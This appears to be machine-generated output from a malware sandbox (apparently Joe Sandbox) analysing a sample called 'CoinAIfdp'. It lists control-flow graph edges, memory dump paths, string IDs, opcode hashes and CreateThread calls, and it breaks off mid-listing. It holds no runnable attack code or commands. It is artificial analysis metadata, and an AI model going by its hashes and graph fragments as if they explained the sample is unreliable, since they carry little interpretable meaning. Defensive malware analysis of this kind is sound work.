                                        control_flow_graph 0 2828b70-2828b9e 1 2828ba0 0->1 2 2828ba5-2828cc4 0->2 1->2 5 2828cd3-2828cdf 2->5 6 2828cc6-2828ccd call 282b2d3 2->6 7 2828ce1 5->7 8 2828ce6-2828ceb 5->8 6->5 7->8 9 2828d23-2828d6c 8->9 10 2828ced-2828cf9 8->10 19 2828d73-2828f8c 9->19 20 2828d6e 9->20 11 2828d00-2828d1e 10->11 12 2828cfb 10->12 13 282a1d0-282a1d6 11->13 12->11 15 282a201 13->15 16 282a1d8-282a1f8 13->16 21 282a202 15->21 16->15 42 28299bc-28299c8 19->42 20->19 21->21 43 2828f91-2828f9d 42->43 44 28299ce-2829a06 42->44 45 2828fa4-28290c9 43->45 46 2828f9f 43->46 53 2829ab5-2829abb 44->53 79 28290cb-2829103 45->79 80 2829109-2829192 45->80 46->45 54 2829ac1-2829af9 53->54 55 2829a0b-2829a36 53->55 65 2829cf8-2829cfe 54->65 64 2829a42-2829a5d 55->64 66 2829a90-2829ab2 64->66 67 2829a5f-2829a63 64->67 69 2829d04-2829d4c 65->69 70 2829afe-2829c29 65->70 66->53 67->66 71 2829a65-2829a8d 67->71 77 2829dc7-2829e12 69->77 78 2829d4e-2829dc1 69->78 120 2829c96-2829c9a 70->120 121 2829c2b-2829c94 70->121 71->66 99 282a19a-282a1a0 77->99 78->77 79->80 106 28291a1-2829225 80->106 107 2829194-282919c 80->107 101 282a1a6-282a1ce 99->101 102 2829e17-2829e99 99->102 101->13 122 2829ec1-2829ecd 102->122 123 2829e9b-2829eb6 102->123 142 2829227-282922f 106->142 143 2829234-28292b8 106->143 110 28299ad-28299b9 107->110 110->42 124 2829ccc-2829cde 120->124 125 2829c9c-2829cca 120->125 136 2829cdf-2829cf5 121->136 126 2829ed4-2829ee0 122->126 127 2829ecf 122->127 123->122 124->136 125->136 132 2829ee2-2829eee 126->132 133 2829ef3-2829f02 126->133 127->126 137 282a181-282a197 132->137 139 2829f04 133->139 140 2829f0b-282a162 133->140 136->65 137->99 139->140 144 2829f11-2829f4f 139->144 145 2829fd1-282a03a 139->145 146 2829f54-2829fcc 139->146 147 282a03f-282a0a8 139->147 148 282a0ad-282a0ea 139->148 168 282a16d-282a179 140->168 142->110 181 28292c7-282934b 143->181 182 28292ba-28292c2 143->182 144->168 145->168 146->168 147->168 169 282a133-282a139 148->169 168->137 172 282a13b-282a145 169->172 173 282a0ec-282a11f 169->173 172->168 178 282a121 173->178 179 282a126-282a130 173->179 178->179 179->169 188 282935a-28293de 181->188 189 282934d-2829355 181->189 182->110 195 28293e0-28293e8 188->195 196 28293ed-2829471 188->196 189->110 195->110 202 2829473-282947b 196->202 203 2829480-2829504 196->203 202->110 209 2829513-2829597 203->209 210 2829506-282950e 203->210 216 28295a6-282962a 209->216 217 2829599-28295a1 209->217 210->110 223 2829639-28296bd 216->223 224 282962c-2829634 216->224 217->110 230 28296bf-28296c7 223->230 231 28296cc-2829750 223->231 224->110 230->110 237 2829752-282975a 231->237 238 282975f-28297e3 231->238 237->110 244 28297f2-2829876 238->244 245 28297e5-28297ed 238->245 251 2829885-2829909 244->251 252 2829878-2829880 244->252 245->110 258 282990b-2829913 251->258 259 2829918-282999c 251->259 252->110 258->110 265 28299a8-28299aa 259->265 266 282999e-28299a6 259->266 265->110 266->110
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$2
                                        • API String ID: 0-2664012858
                                        • Opcode ID: 7148bf70d309e139f8d19996a910c8f66cb137869fee62a458f901ee4c6c3f85
                                        • Instruction ID: b11daa803d5320bc4d251d6fe94a6cfa136ddcf1118d7b77e5831c909d3f7fff
                                        • Opcode Fuzzy Hash: 7148bf70d309e139f8d19996a910c8f66cb137869fee62a458f901ee4c6c3f85
                                        • Instruction Fuzzy Hash: BDD2E2B8A012288FDB64DF69D984B9DB7B6FB88304F1081EAD50DA7355DB309E85CF41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 268 282a204-282a2ac 275 282a2b2-282a375 268->275 276 282a384-282a3cc 268->276 275->276 309 282a377-282a381 275->309 281 282a3d2-282a414 276->281 282 282a54c-282a600 276->282 290 282a531-282a540 281->290 311 282a606-282a6bd 282->311 312 282a6bf-282a6f9 282->312 291 282a431-282a440 290->291 292 282a546-282a547 290->292 296 282a442 291->296 297 282a447-282a4b9 291->297 294 282a886-282a8db 292->294 314 282ab74-282aba2 294->314 296->297 306 282a4c0-282a526 297->306 307 282a4bb 297->307 344 282a52b 306->344 345 282a528 306->345 307->306 309->276 324 282a700-282a709 311->324 312->324 320 282a8e0-282a921 314->320 321 282aba8-282abaf 314->321 330 282a923 320->330 331 282a92a-282a92b 320->331 387 282abb1 call 282d4a8 321->387 388 282abb1 call 282d4b8 321->388 328 282a871-282a880 324->328 325 282abb7-282abd3 348 282abdb 325->348 328->294 333 282a70e-282a71d 328->333 330->331 335 282a930-282a942 330->335 336 282aac1-282ab06 330->336 337 282aa77-282aabc 330->337 338 282a955-282a9a5 330->338 339 282a9aa-282aa08 330->339 340 282ab2a-282ab63 330->340 341 282ab08-282ab1a 330->341 342 282aa0d-282aa72 330->342 343 282ab6e 331->343 346 282a724-282a7a5 333->346 347 282a71f 333->347 349 282a944 335->349 350 282a949-282a950 335->350 336->343 337->343 338->343 339->343 340->343 351 282ab21-282ab28 341->351 352 282ab1c 341->352 342->343 343->314 344->290 345->344 377 282a7a7-282a7d2 346->377 378 282a80c-282a837 346->378 347->346 349->350 350->343 351->343 352->351 379 282a7d4 377->379 380 282a7d9-282a80a 377->380 381 282a839 378->381 382 282a83e-282a860 378->382 379->380 386 282a86b 380->386 381->382 382->386 386->328 387->325 388->325
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-3065217502
                                        • Opcode ID: b5e228c92484bcfd2d951753f94f7e8bc88b0e4eb5cab0d156594eae22b4a3c8
                                        • Instruction ID: f48d8c402270730e5a0140e0001468a1c75a7464bee1cf4e2b1cdbcf62d413d9
                                        • Opcode Fuzzy Hash: b5e228c92484bcfd2d951753f94f7e8bc88b0e4eb5cab0d156594eae22b4a3c8
                                        • Instruction Fuzzy Hash: F542A1B8A042298FDB64DF28C984B99B7B6FF88304F1081E9D54DA7355DB30AE85CF54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 664 2828b61-2828b9e 665 2828ba0 664->665 666 2828ba5-2828cc4 664->666 665->666 669 2828cd3-2828cdf 666->669 670 2828cc6-2828ccd call 282b2d3 666->670 671 2828ce1 669->671 672 2828ce6-2828ceb 669->672 670->669 671->672 673 2828d23-2828d6c 672->673 674 2828ced-2828cf9 672->674 683 2828d73-2828f8c 673->683 684 2828d6e 673->684 675 2828d00-2828d1e 674->675 676 2828cfb 674->676 677 282a1d0-282a1d6 675->677 676->675 679 282a201 677->679 680 282a1d8-282a1f8 677->680 685 282a202 679->685 680->679 706 28299bc-28299c8 683->706 684->683 685->685 707 2828f91-2828f9d 706->707 708 28299ce-2829a06 706->708 709 2828fa4-28290c9 707->709 710 2828f9f 707->710 717 2829ab5-2829abb 708->717 743 28290cb-2829103 709->743 744 2829109-2829192 709->744 710->709 718 2829ac1-2829af9 717->718 719 2829a0b-2829a36 717->719 729 2829cf8-2829cfe 718->729 728 2829a42-2829a5d 719->728 730 2829a90-2829ab2 728->730 731 2829a5f-2829a63 728->731 733 2829d04-2829d4c 729->733 734 2829afe-2829c29 729->734 730->717 731->730 735 2829a65-2829a8d 731->735 741 2829dc7-2829e12 733->741 742 2829d4e-2829dc1 733->742 784 2829c96-2829c9a 734->784 785 2829c2b-2829c94 734->785 735->730 763 282a19a-282a1a0 741->763 742->741 743->744 770 28291a1-2829225 744->770 771 2829194-282919c 744->771 765 282a1a6-282a1ce 763->765 766 2829e17-2829e99 763->766 765->677 786 2829ec1-2829ecd 766->786 787 2829e9b-2829eb6 766->787 806 2829227-282922f 770->806 807 2829234-28292b8 770->807 774 28299ad-28299b9 771->774 774->706 788 2829ccc-2829cde 784->788 789 2829c9c-2829cca 784->789 800 2829cdf-2829cf5 785->800 790 2829ed4-2829ee0 786->790 791 2829ecf 786->791 787->786 788->800 789->800 796 2829ee2-2829eee 790->796 797 2829ef3-2829f02 790->797 791->790 801 282a181-282a197 796->801 803 2829f04 797->803 804 2829f0b-282a162 797->804 800->729 801->763 803->804 808 2829f11-2829f4f 803->808 809 2829fd1-282a03a 803->809 810 2829f54-2829fcc 803->810 811 282a03f-282a0a8 803->811 812 282a0ad-282a0ea 803->812 832 282a16d-282a179 804->832 806->774 845 28292c7-282934b 807->845 846 28292ba-28292c2 807->846 808->832 809->832 810->832 811->832 833 282a133-282a139 812->833 832->801 836 282a13b-282a145 833->836 837 282a0ec-282a11f 833->837 836->832 842 282a121 837->842 843 282a126-282a130 837->843 842->843 843->833 852 282935a-28293de 845->852 853 282934d-2829355 845->853 846->774 859 28293e0-28293e8 852->859 860 28293ed-2829471 852->860 853->774 859->774 866 2829473-282947b 860->866 867 2829480-2829504 860->867 866->774 873 2829513-2829597 867->873 874 2829506-282950e 867->874 880 28295a6-282962a 873->880 881 2829599-28295a1 873->881 874->774 887 2829639-28296bd 880->887 888 282962c-2829634 880->888 881->774 894 28296bf-28296c7 887->894 895 28296cc-2829750 887->895 888->774 894->774 901 2829752-282975a 895->901 902 282975f-28297e3 895->902 901->774 908 28297f2-2829876 902->908 909 28297e5-28297ed 902->909 915 2829885-2829909 908->915 916 2829878-2829880 908->916 909->774 922 282990b-2829913 915->922 923 2829918-282999c 915->923 916->774 922->774 929 28299a8-28299aa 923->929 930 282999e-28299a6 923->930 929->774 930->774
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: 998be397f716a3cdceec192fd730924c6eec21a639d96261649d28853f99938e
                                        • Instruction ID: 413fa558b84e1828c6397f1dfe447b268c4b1592f93b50cd1dfdede8ef14b8d6
                                        • Opcode Fuzzy Hash: 998be397f716a3cdceec192fd730924c6eec21a639d96261649d28853f99938e
                                        • Instruction Fuzzy Hash: 0451DCB5E046188BEB18DF6BD94468EFAF3BFC8304F14C1AAC50CAB255DB3409858F54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 991 2824748-2824769 992 2824770-282484f 991->992 993 282476b 991->993 995 2824f46-2824f53 992->995 996 2824855-2824996 call 2820da0 992->996 993->992 997 2824f59-2824f6e 995->997 1042 2824f0f-2824f39 996->1042 1043 282499c-28249f7 996->1043 999 2825674-282567d 997->999 1001 2825683-282569a 999->1001 1002 2824f7c-2824f86 999->1002 1003 2824f88 1002->1003 1004 2824f8d-2825081 call 2820da0 1002->1004 1003->1004 1025 2825083-282508f 1004->1025 1026 28250ab 1004->1026 1027 2825091-2825097 1025->1027 1028 2825099-282509f 1025->1028 1029 28250b1-28250d1 1026->1029 1031 28250a9 1027->1031 1028->1031 1033 28250d3-282512c 1029->1033 1034 2825131-28251b1 1029->1034 1031->1029 1046 2825671 1033->1046 1054 28251b3-2825206 1034->1054 1055 2825208-282524b call 2820da0 1034->1055 1056 2824f43 1042->1056 1057 2824f3b 1042->1057 1051 28249f9 1043->1051 1052 28249fc-2824a07 1043->1052 1046->999 1051->1052 1053 2824e21-2824e27 1052->1053 1058 2824a0c-2824a2a 1053->1058 1059 2824e2d-2824eaa call 2820170 1053->1059 1086 2825256-282525f 1054->1086 1055->1086 1056->995 1057->1056 1061 2824a81-2824a96 1058->1061 1062 2824a2c-2824a30 1058->1062 1102 2824ef9-2824eff 1059->1102 1067 2824a98 1061->1067 1068 2824a9d-2824ab3 1061->1068 1062->1061 1065 2824a32-2824a3d 1062->1065 1069 2824a73-2824a79 1065->1069 1067->1068 1073 2824ab5 1068->1073 1074 2824aba-2824ad1 1068->1074 1077 2824a7b-2824a7c 1069->1077 1078 2824a3f-2824a43 1069->1078 1073->1074 1075 2824ad3 1074->1075 1076 2824ad8-2824aee 1074->1076 1075->1076 1082 2824af0 1076->1082 1083 2824af5-2824afc 1076->1083 1085 2824aff-2824b41 1077->1085 1080 2824a45 1078->1080 1081 2824a49-2824a61 1078->1081 1080->1081 1087 2824a63 1081->1087 1088 2824a68-2824a70 1081->1088 1082->1083 1083->1085 1089 2824b43-2824b4f 1085->1089 1090 2824b55-2824d25 1085->1090 1092 28252bf-28252ce 1086->1092 1087->1088 1088->1069 1089->1090 1100 2824d27-2824d2b 1090->1100 1101 2824d89-2824d9e 1090->1101 1093 28252d0-2825358 1092->1093 1094 2825261-2825289 1092->1094 1129 28254d1-28254dd 1093->1129 1095 2825290-28252b9 1094->1095 1096 282528b 1094->1096 1095->1092 1096->1095 1100->1101 1108 2824d2d-2824d3c 1100->1108 1106 2824da0 1101->1106 1107 2824da5-2824dc6 1101->1107 1104 2824f01-2824f07 1102->1104 1105 2824eac-2824ef6 1102->1105 1104->1042 1105->1102 1106->1107 1109 2824dc8 1107->1109 1110 2824dcd-2824dec 1107->1110 1112 2824d7b-2824d81 1108->1112 1109->1110 1117 2824df3-2824e13 1110->1117 1118 2824dee 1110->1118 1115 2824d83-2824d84 1112->1115 1116 2824d3e-2824d42 1112->1116 1123 2824e1e 1115->1123 1119 2824d44-2824d48 1116->1119 1120 2824d4c-2824d6d 1116->1120 1121 2824e15 1117->1121 1122 2824e1a 1117->1122 1118->1117 1119->1120 1125 2824d74-2824d78 1120->1125 1126 2824d6f 1120->1126 1121->1122 1122->1123 1123->1053 1125->1112 1126->1125 1131 28254e3-282553e 1129->1131 1132 282535d-2825366 1129->1132 1147 2825540-2825573 1131->1147 1148 2825575-282559f 1131->1148 1133 2825368 1132->1133 1134 282536f-28254c5 1132->1134 1133->1134 1136 2825444-2825484 1133->1136 1137 2825375-28253b5 1133->1137 1138 28253ba-28253fa 1133->1138 1139 28253ff-282543f 1133->1139 1152 28254cb 1134->1152 1136->1152 1137->1152 1138->1152 1139->1152 1156 28255a8-2825662 1147->1156 1148->1156 1152->1129 1156->1046
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \n
                                        • API String ID: 0-2483797820
                                        • Opcode ID: 081a0333e4e6f4a86364abb0bee5726bca767618613de03890574e8c42a7a3ff
                                        • Instruction ID: 26e0652e0fcbe22f7aeafe77553c6a8b66ef3b705019704f74a50008e84a3a35
                                        • Opcode Fuzzy Hash: 081a0333e4e6f4a86364abb0bee5726bca767618613de03890574e8c42a7a3ff
                                        • Instruction Fuzzy Hash: FBA2B479A00228CFDB64CF69C984B99BBB2FF89304F1581E9D50DAB225D7319E85CF50
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad71a60a3f623f5e776794d4ee882779235638df256ede28dbd6c4f04c7c8b4f
                                        • Instruction ID: 29186eeec206e541c8b835da52413f9e13fca6f276a2a396fec7dc4f9d90a808
                                        • Opcode Fuzzy Hash: ad71a60a3f623f5e776794d4ee882779235638df256ede28dbd6c4f04c7c8b4f
                                        • Instruction Fuzzy Hash: 38C1E5B8D05268CFDB64CFA9C944BDDBBF2AB49314F1080AAD44DAB255D7745AC8CF80
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21ca64f16f1e4c8254cd0786b396d2d055acf46c83c9e0df4e8c8b3323ca1101
                                        • Instruction ID: 8b19c09400dcb9bc1d77be516353afeadc18224f46a2f7660423cbeb74b180e2
                                        • Opcode Fuzzy Hash: 21ca64f16f1e4c8254cd0786b396d2d055acf46c83c9e0df4e8c8b3323ca1101
                                        • Instruction Fuzzy Hash: D321A571D056088BEB18DFABC9447AEBBF7BF88300F14C07A8419AB2A5EB745546CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 389 282b2d3-282b2ea 390 282b2f1-282b308 389->390 391 282b2ec 389->391 393 282b30b-282b311 390->393 391->390 394 282b313 393->394 395 282b31a-282b31b 393->395 394->395 396 282b330-282b336 394->396 397 282b337-282b338 394->397 398 282b4ea 394->398 399 282b33a-282b4d7 call 2827780 394->399 400 282b31d-282b324 394->400 395->396 397->396 402 282b4f3-282b50b 398->402 399->393 428 282b4dd-282b4e5 399->428 400->399 401 282b326-282b32e 400->401 401->393 402->393 406 282b511-282b517 402->406 406->393 428->393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$0L$0L$0L$0L$0L$0L
                                        • API String ID: 0-2964910584
                                        • Opcode ID: 237f6f6b1ab24988c3493a5b4f2295f52977a4f7bb6085c5b13248ce8376a5d2
                                        • Instruction ID: a226893e27ad0a0584455067429a8919ec301529d16dba26eab4d54ff5a0f9fd
                                        • Opcode Fuzzy Hash: 237f6f6b1ab24988c3493a5b4f2295f52977a4f7bb6085c5b13248ce8376a5d2
                                        • Instruction Fuzzy Hash: 51610978E05208DFDB04EFA9D58469EBBF2FF88304F10902AE519A7359EB34594ACF51

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 429 28244a0-28244bb 430 28244c2-28244d4 429->430 431 28244bd 429->431 433 28244d7-28244dd 430->433 431->430 434 28244e6-28244e7 433->434 435 28244df 433->435 438 282458b-28245a5 434->438 435->434 436 2824643-2824660 call 2825d70 435->436 437 2824526-2824527 435->437 435->438 439 282455b-282457a 435->439 440 2824529-2824530 435->440 441 28244ec-2824516 435->441 453 2824666-2824693 436->453 442 282451e-2824525 437->442 463 28245a8 call 2825820 438->463 464 28245a8 call 282580f 438->464 439->433 449 2824580-2824586 439->449 440->442 443 2824532-282454c 440->443 441->442 443->433 451 282454e-2824556 443->451 449->433 450 28245ae-2824630 450->433 462 2824636-282463e 450->462 451->433 453->441 459 2824699-28246a1 453->459 459->433 462->433 463->450 464->450
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L$0L$D@
                                        • API String ID: 0-3565834154
                                        • Opcode ID: cfc112f84c332b7320b3eda40986d6945e1a96df1868701e7289a16c788a2bda
                                        • Instruction ID: 3f0ab513758dfd318957122e56a4a1efe7e8eb2c69f455529f87b9485ffadcfa
                                        • Opcode Fuzzy Hash: cfc112f84c332b7320b3eda40986d6945e1a96df1868701e7289a16c788a2bda
                                        • Instruction Fuzzy Hash: 1C512B78D0521DCFDB00DFE9D445A9DBBB1FF89304F10902AD509B7294EB745A8ACB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: b4de71f508dade2618832fe0095cd54ca65b46fe948aad864b33347e6fea3897
                                        • Instruction ID: 8d3714dd0a8b4e2025ddc98533883dc17f9097fd6cf9dee2542d636d799e314c
                                        • Opcode Fuzzy Hash: b4de71f508dade2618832fe0095cd54ca65b46fe948aad864b33347e6fea3897
                                        • Instruction Fuzzy Hash: 14B1B0B8906268CFDB60CFA8D944BDDBBF1EB49314F10509AD44DAB255D7749AC8CF80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 932 2820848-2820860 933 2820862 932->933 934 2820867-2820879 932->934 933->934 936 282087c-2820882 934->936 937 2820884 936->937 938 282088b-282088c 936->938 937->938 939 28208c6-28208d4 937->939 940 28208d6-28208da 937->940 941 28208db-2820904 937->941 942 282088e 937->942 938->939 939->936 941->936 949 282090a-2820910 941->949 943 2820894-28208ba 942->943 943->936 948 28208bc-28208c4 943->948 948->936 949->936
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: 0efb39fb71bd27956e8f0e481c909f2537b2ec420763ab0adb26f6d43bba1b78
                                        • Instruction ID: ee7e055a80d22f432fbefef182d7741cf657a74542cc8826bf45f31be088bea9
                                        • Opcode Fuzzy Hash: 0efb39fb71bd27956e8f0e481c909f2537b2ec420763ab0adb26f6d43bba1b78
                                        • Instruction Fuzzy Hash: C72175B8D05118EFEB04EFA9D84579EBBF1FF48304F1080AAD019E3265E7744A89CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 950 5276240-52762fc 958 5276302-527630d 950->958 959 52700fc-5270107 950->959 958->959 960 5270110-5270389 959->960 961 5270109-527050c 959->961 960->959 970 527038f-527039a 960->970 965 5270517-527053f 961->965 965->959 969 5270545-5270550 965->969 969->959 970->959
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L$0L
                                        • API String ID: 0-4101852023
                                        • Opcode ID: 2a3e587a5d38a7a7849e76a7b2536b447e1c38f3fee4f6815dad739382e7e3c8
                                        • Instruction ID: 6ba753bcead6b525ea2ebbf1d0aefef0b456e9bb344efa5f0b774c69d41f805f
                                        • Opcode Fuzzy Hash: 2a3e587a5d38a7a7849e76a7b2536b447e1c38f3fee4f6815dad739382e7e3c8
                                        • Instruction Fuzzy Hash: 7E21B7B4915228CFDB24DF28D988AD9B7B2FB89700F1044E9D419A3B94EB305F85CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 971 52771d0-52771d7 972 527e417-527e452 971->972 973 52771dd-52771de 971->973 978 527e45a-527e461 972->978 973->972
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Y
                                        • API String ID: 0-947205236
                                        • Opcode ID: dfe1c8f183bb6da9e8a7d708a0bbfaef0b3df997ea362b3ee5d8d82505b40fe1
                                        • Instruction ID: 6992d9fd9ab88b64379d51be05a0ba267fd1c2206bd0fe576684e21c0c7b8882
                                        • Opcode Fuzzy Hash: dfe1c8f183bb6da9e8a7d708a0bbfaef0b3df997ea362b3ee5d8d82505b40fe1
                                        • Instruction Fuzzy Hash: 99F01534961228CFDB28EF61D8A9BA97776BF85355F0004D8D00E27290EB346E88EF00

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 979 5270506-527050c 980 5270517-527053f 979->980 982 5270545-5270550 980->982 983 52700fc-5270107 980->983 982->983 984 5270110-5270389 983->984 985 5270109 983->985 984->983 990 527038f-527039a 984->990 985->979 990->983
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728580741.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_5270000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: X$h
                                        • API String ID: 0-795848406
                                        • Opcode ID: 02dae12c2103cd7c8e4972f5767d81b827d6f742cc87727f23f9d87269d8f190
                                        • Instruction ID: da2b3d808ac3ebf1dfab6b95507aa339780d5b888969e92eb9f05919df202b7a
                                        • Opcode Fuzzy Hash: 02dae12c2103cd7c8e4972f5767d81b827d6f742cc87727f23f9d87269d8f190
                                        • Instruction Fuzzy Hash: 53F0C97886122DCFDB24DF54D958BAABB72BF44315F0044E5D509A3280E7755EC8DF05

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1162 4ea403b-4ea410d CreateThread 1164 4ea410f-4ea4115 1162->1164 1165 4ea4116-4ea414e 1162->1165 1164->1165
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 04EA40FD
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728023351.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_4ea0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 74c46704fb57d3886b8726d556c772b0a5265d97eb7e124ea6a497a61ec961c4
                                        • Instruction ID: d1f3d9e0029f4cb1793fe62dda81bfae17d78a49835dbff57745ef07761d455b
                                        • Opcode Fuzzy Hash: 74c46704fb57d3886b8726d556c772b0a5265d97eb7e124ea6a497a61ec961c4
                                        • Instruction Fuzzy Hash: C54168B9D042589FCF10CFA9E984ADEFBF1BB19310F24A02AE814B7310D375A945CB64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1168 4ea4040-4ea410d CreateThread 1170 4ea410f-4ea4115 1168->1170 1171 4ea4116-4ea414e 1168->1171 1170->1171
                                        APIs
                                        • CreateThread.KERNELBASE(?,?,?,?,?,?), ref: 04EA40FD
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1728023351.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_4ea0000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: 03b308ce9d7c908b8bea6bff0fcfb40061343bb1f5212e64a3ec01c30025a8d0
                                        • Instruction ID: 1c9bb158a1ffdffb37627de5f84e42848102141f0081281fcea870c7067db9f7
                                        • Opcode Fuzzy Hash: 03b308ce9d7c908b8bea6bff0fcfb40061343bb1f5212e64a3ec01c30025a8d0
                                        • Instruction Fuzzy Hash: A24157B9D042589FCF10CFA9E984ADEFBF1BB19310F14A02AE814B7210D775A955CB64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.1722869120.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_16_2_2820000_CoinAIfdp.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0L
                                        • API String ID: 0-3270656709
                                        • Opcode ID: a45f2584ccc0e7cfe081a5c3848ba78cf64853fee4632592ccc069d1c2528eb5
                                        • Instruction ID: 57c15b9d399699b590c7db2dd59c9dba13ab1d9a8ab5e17a89e425a1482bdb41
                                        • Opcode Fuzzy Hash: a45f2584ccc0e7cfe081a5c3848ba78cf64853fee4632592ccc069d1c2528eb5
                                        • Instruction Fuzzy Hash: BDA1B1B8906268CFDB60CFA8C944BDDBBF1EB49314F11909AD44DAB255D7749AC8CF80
                                        Strings
                                        Memory Dump Source
